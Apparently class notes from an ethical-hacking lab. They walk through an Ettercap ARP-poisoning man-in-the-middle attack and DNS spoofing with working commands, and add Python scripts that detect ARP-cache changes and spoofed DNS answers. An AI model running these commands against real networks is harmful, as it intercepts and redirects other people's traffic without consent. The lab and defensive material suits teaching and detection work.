Ettercap

Man-in-the-middle (MITM) attack: intercept the traffic between a computer and its router, capture the packets and reassemble them.

Man in the middle (MITM) attack

Show the ARP table (which MAC address the machine currently associates with the router)

arp -a

Start Ettercap to intercept the traffic (graphical)

ettercap -G
  • Under the Sniff menu, choose Unified Sniffing and pick the network interface (eth0, or the wireless one)
  • Under Hosts, choose Scan all hosts
  • Under Hosts, choose Host list
  • Select the gateway, click on Add to Target 1
  • Select the victim, click on Add to Target 2
  • Any traffic between the router (target 1) and the victim (target 2) now passes through the Kali Linux machine
  • Under the Mitm menu choose ARP Poisoning, and check Sniff remote connections

Test on victim machine

Open a browser

Show the ARP table again: the router's MAC should have changed (the victim now thinks Kali is the router)

arp -a
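The check above is done by eye. The following is an added example (not part of the original notes) of the same check done as a defender would automate it: parse `arp -a` output, compare it against a trusted baseline, and raise an alert when the gateway's MAC changes or when one MAC claims several IPs, which is what an ARP-poisoning run leaves behind in the cache. The ARP snapshots, IPs and MACs are constructed for the example; the parser accepts both the Linux (`name (ip) at mac`) and Windows (`ip  mac  type`) layouts.

```python
import re
from collections import defaultdict

# Constructed `arp -a` snapshots (Linux layout) before and after an
# ARP-poisoning run. Every address and MAC below is made up.
ARP_BEFORE = """\
_gateway (192.168.56.1) at 0a:00:27:00:00:10 [ether] on eth0
victim-pc (192.168.56.20) at 08:00:27:a1:b2:c3 [ether] on eth0
"""
ARP_AFTER = """\
_gateway (192.168.56.1) at 08:00:27:de:ad:01 [ether] on eth0
victim-pc (192.168.56.20) at 08:00:27:a1:b2:c3 [ether] on eth0
attacker (192.168.56.30) at 08:00:27:de:ad:01 [ether] on eth0
"""
# Constructed snapshot in the Windows `arp -a` layout (dashes in the MAC).
ARP_WINDOWS = """\
Interface: 192.168.56.20 --- 0x5
  Internet Address      Physical Address      Type
  192.168.56.1          0a-00-27-00-00-10     dynamic
  192.168.56.255        ff-ff-ff-ff-ff-ff     static
"""

# An IPv4 address followed (after non-digits) by a MAC in either a:b or a-b notation.
ARP_ENTRY = re.compile(
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\D+?(?P<mac>(?:[0-9a-f]{2}[:-]){5}[0-9a-f]{2})", re.I
)

def parse_arp(text):
    """Return {ip: mac} from `arp -a` output; header and incomplete lines are skipped."""
    table = {}
    for line in text.splitlines():
        m = ARP_ENTRY.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower().replace("-", ":")
    return table

def arp_alerts(baseline, current, gateway_ip):
    """Compare the current ARP cache against a trusted baseline snapshot."""
    alerts = []
    old, new = baseline.get(gateway_ip), current.get(gateway_ip)
    if old and new and old != new:
        alerts.append(f"gateway {gateway_ip} MAC changed {old} -> {new}")
    # Poisoning makes the attacker's MAC answer for the gateway (and often the
    # victim) while still owning its own IP, so one MAC maps to several IPs.
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        if mac != "ff:ff:ff:ff:ff:ff":  # broadcast entry is expected to be shared
            by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            alerts.append(f"MAC {mac} claims several IPs: {', '.join(sorted(ips))}")
    return alerts

if __name__ == "__main__":
    base = parse_arp(ARP_BEFORE)
    for alert in arp_alerts(base, parse_arp(ARP_AFTER), "192.168.56.1"):
        print("ALERT:", alert)
```

In practice the baseline is taken once on a known-clean network and the comparison is run on a timer (or on the output of a switch's ARP inspection feature); a static ARP entry for the gateway on important hosts removes the first alert condition entirely.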

Analyze the traffic and reassemble packets

xplico: forensic tool under the Kali menu "Forensics"; it might need to be downloaded and installed first.

sudo apt install xplico

Command line: intercept everything on the network (spoof the ARP table)

# Can be run before using Wireshark
ettercap -T -M arp:remote //

DNS Spoofing Attack

DNS: Domain Name System, resolves names to IP addresses (the network itself only uses IPs). Use www.certifiedhacker.com (a website meant for testing, used here as the target).

Obtain the IP addresses of the websites (source and destination)

ping google.com
ping certifiedhacker.com

Edit the Ettercap DNS configuration file (take a copy first)

# The directory name is lowercase on Linux (paths are case-sensitive)
cp /etc/ettercap/etter.dns /etc/ettercap/etter.dns.bak
nano /etc/ettercap/etter.dns

Go to the "microsoft sucks" section and add the line

# Add redirection for certifiedhacker.com to other site (172.217.11.46)
*.certifiedhacker.com A 172.217.11.46

Command line: apply the DNS file to ALL traffic (spoof DNS)

# -T: text (command line) interface, -q: quiet, -M arp:remote: ARP poisoning MITM, -P dns_spoof: load the dns_spoof plugin (reads etter.dns)
ettercap -T -q -M arp:remote -P dns_spoof ///

Flush the cache (on the Windows machine)

ipconfig /release # teacher was a bit confused… (release/renew only redo the DHCP lease)
ipconfig /renew
ipconfig /flushdns # this is the command that actually clears the DNS resolver cache

Test if it works: it should give Google's IP

ping certifiedhacker.com

Go in a browser and test www.certifiedhacker.com
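The test above succeeds when a name resolves to the wrong site's IP. As an added example (not from the original notes), here is how that same symptom is detected from the defender's side: DNS answers seen on the wire are checked against pinned name-to-IP expectations, and any transaction that receives two different answers is flagged, since a spoofed reply racing the legitimate one produces exactly that. The log format, the `PINNED` table and all addresses except the page's 172.217.11.46 are constructed for the example.

```python
import re

# Constructed log of DNS A answers, one per line (the key=value layout is
# made up for this example). 172.217.11.46 is the address the notes use for
# Google; 203.0.113.5 stands in for certifiedhacker.com's real address.
DNS_LOG = """\
txid=0x1a2b name=google.com ip=172.217.11.46 from=192.168.56.1
txid=0x3c4d name=certifiedhacker.com ip=172.217.11.46 from=192.168.56.1
txid=0x3c4d name=certifiedhacker.com ip=203.0.113.5 from=192.168.56.1
txid=0x5e6f name=example.org ip=198.51.100.7 from=192.168.56.1
"""

# Expected A records for names the site cares about (constructed).
PINNED = {
    "google.com": {"172.217.11.46"},
    "certifiedhacker.com": {"203.0.113.5"},
}

def parse_dns_log(text):
    """Parse key=value lines into dicts; lines without a name and ip are skipped."""
    records = []
    for line in text.splitlines():
        fields = dict(re.findall(r"(\w+)=(\S+)", line))
        if "name" in fields and "ip" in fields:
            fields["name"] = fields["name"].lower().rstrip(".")
            records.append(fields)
    return records

def dns_alerts(records, pinned):
    """Flag answers that contradict the pins or that collide on a transaction id."""
    alerts = []
    ip_owner = {ip: name for name, ips in pinned.items() for ip in ips}
    for r in records:
        name, ip = r["name"], r["ip"]
        if name in pinned and ip not in pinned[name]:
            alerts.append(f"{name} answered {ip}, expected one of {sorted(pinned[name])}")
        if ip in ip_owner and ip_owner[ip] != name:
            alerts.append(f"{name} answered {ip}, which is pinned to {ip_owner[ip]}")
    # Two different answers for one (txid, name) pair: a forged reply and the
    # real one both reached the client.
    seen = {}
    for r in records:
        seen.setdefault((r.get("txid"), r["name"]), set()).add(r["ip"])
    for (txid, name), ips in seen.items():
        if txid and len(ips) > 1:
            alerts.append(f"txid {txid}: conflicting answers for {name}: {', '.join(sorted(ips))}")
    return alerts

if __name__ == "__main__":
    for alert in dns_alerts(parse_dns_log(DNS_LOG), PINNED):
        print("ALERT:", alert)
```

The transaction-id check only fires when the legitimate reply is also observed; an inline MITM that drops it leaves just the forged answer, which is why the pin checks are kept alongside it. Pins should be refreshed from an out-of-band source (or replaced by DNSSEC validation) rather than hard-coded, as they are here for the example.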

Translate an IP to a name or a name to an IP

nslookup <ip or name>